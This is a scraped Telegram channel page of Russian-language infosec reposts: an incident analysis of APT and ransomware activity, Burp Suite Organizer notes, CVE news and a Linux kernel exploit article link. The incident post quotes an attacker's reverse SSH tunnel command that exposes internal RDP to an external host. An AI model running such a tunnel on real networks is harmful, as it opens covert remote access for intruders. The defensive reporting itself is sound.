متاح الآن! بحث تيليغرام 2025 — أهم رؤى العام 
Fsecurity | HH
الذهاب إلى القناة على Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
إظهار المزيد2 011
المشتركون
+124 ساعات
-47 أيام
-1030 أيام
أرشيف المشاركات
2 010
Repost from purple shift
В отчётах об атаках различные хакерские группировки обычно описываются поодиночке: пришёл такой-то атакующий, использовал такие-то техники, на основе этих техник и артефактов атрибутируем атаку к такой-то APT.
Но на практике всё бывает не так однозначно. Вот пример из наших недавних расследований. На одной из машин пострадавшей организации всплывают:
– бэкдоры алледжидли-азиатской APT,
– запуск SSH-туннелей, форвардящих порт RDP; в одном случае сервер управления пересекается с сервером управления алледжидли-азиатского бэкдора,
– инструменты для извлечения паролей,
– явление шифровальщика, а его операторы подключаются через SSH-туннель:
vmhost.exe -C -N -R 443:<internal_ip>:3389 root@<external_ip> -P 80 -pw <password> -v2 010
Repost from PurpleBear
В
Burp Suite Proffesional/Community v2024.7.6 появилась новая функциональность Burp Organizer.
Суть фичи заключается в ведении логов запросов в отдельной вкладке, к которым можно прикреплять заметки, статусы, сортировать по хронологии и любому другому значению таблицы, а также применять различные фильтры.
Прикопать интересный запрос в Organizer можно с помощью Сtl+o из вкладки Proxy/Repeater/etc, чтобы в любой момент к нему вернуться
Organizer сохраняет следующие значения, которые можно кастомизирвоать:
# - The request index number.
Time - The time the request was made.
Status - The workflow status that you have applied to the message, for example Done or Paused.
Tool - The Burp tool that the message was sent from, such as Burp Repeater or Burp Intruder. If the message is sent from Burp Logger or from an item that is already in Organizer, then the tool identified here is the tool that originally generated the HTTP request.
Method - The HTTP method.
Host - The server hostname.
Path - The URL file path.
Query - The URL query string.
Param count - The number of parameters in the request.
Status code - The HTTP status code of the response.
Length - The length of the response in bytes.
Notes - Any notes that you have made.
Таким образом, можно организовать хаос с десятками вкладок в Repeater в красивую таблицу, с которой удобно работать. Мне очень не хватало подобной функциональности, а как Вам новая фича? Поделитесь пожалуйста своим мнением в комментариях🙏2 010
Repost from Caster
Sara стала второй моей утилитой, которая была добавлена в Kali Linux. Это автономный анализатор конфигураций RouterOS (MikroTik), разработанный для поиска проблем сетевой безопасности. Теперь вы можете установить её напрямую из репозиториев Kali Linux.
https://pkg.kali.org/pkg/sara
2 010
Repost from Proxy Bar
Хакер хакера поневоле брат
*
Уязвимости в популярных\opensource СС\С2 фреймворках
*
2 010
Repost from SecAtor
Продолжаем следить за исследованиями в отношении уязвимостей и связанных с ними угроз.
1. Исследователи AppOmni обнаружили более 1000 серверов ServiceNow, которые раскрывают базы знаний клиентов (KB).
2. Tenable обнаружила уязвимость, которая могла позволить злоумышленникам запускать вредоносный код на серверах Google Cloud, позволяя перехватить внутреннюю зависимость ПО, которую Google предварительно устанавливает на серверах Google Cloud.
Она повлияла на Google Composer. Google устранила проблему и заявила, что не нашла никаких доказательств активной эксплуатации.
3. Varonis опубликовала подробности об атаке с внедрением SOQL (Salesforce Object Query Language), которая позволяла извлечь данные и сведения о клиентах Salesforce через API Aura компании. Выявлена в январе и оперативно исправлена месяц спустя.
4. Исследователи AmberWolf обнаружили Skeleton Cookie (CVE-2024-45488), обход аутентификации в устройстве PAM Safeguard for Privileged Passwords компании One Identity.
Уязвимость может быть использована для получения полного административного доступа к приложению и извлечения паролей и резервных копий.
Поставщик заявляет, что исправит проблему в предстоящей версии приложения 8.0.
5. Исследователи Horizon3 опубликовали технический анализ CVE-2024-8190, активно эксплуатируемой 0-day в Ivanti Cloud Service Appliance (CSA).
Правда, в предыдущий раз Horizon3 некосячила и исправила прошлонедельное сообщение в блоге с предполагаемыми подробностями по недавней ошибке Ivanti (CVE-2024-29847).
На самом деле в отчете фигурировала CVE-2023-28324, которая была исправлена в июне прошлого года.
Исследователи из Summoning Team утверждают, что Horizon3 в спешке пыталась присвоить себе раскрытие одной из ошибок, о которой они сообщали у себя в блоге.
6. Бизоны представили подробный технический анализ уязвимости CVE‑2024‑7965 (некорректная имплементация в V8), которая позволяет исполнять произвольный код в рендерере Google Chrome, показав как ее можно проэксплутатировать (PoC).
2 010
Repost from RedTeam brazzers
Эксплуатация ядерных уязвимостей - довольно рискованное дело, особенно когда нет уверенности, что эксплойт отработает корректно.
@hummelchen0 специально для нашего сообщества разобрал вопрос применения таких эксплойтов в статье (https://hummelchen.gitbook.io/linux_lpe) "Ядерные LPE в Linux на практике". В ней вы сможете узнать, как на своей системе протестировать ядерный сплойт для практически любого ядра Linux и автоматизировать такие проверки для самых популярных дистрибутивов.
2 010
Repost from Bounty On Coffee
Пример того, как должны выглядеть адекватные вилки критичности уязвимостей.
Максимальная выплата конечно маленькая, но если смотреть на low, medium и high, то это выше, чем у почти всех компаний у которых максимальная выплата 500к+.
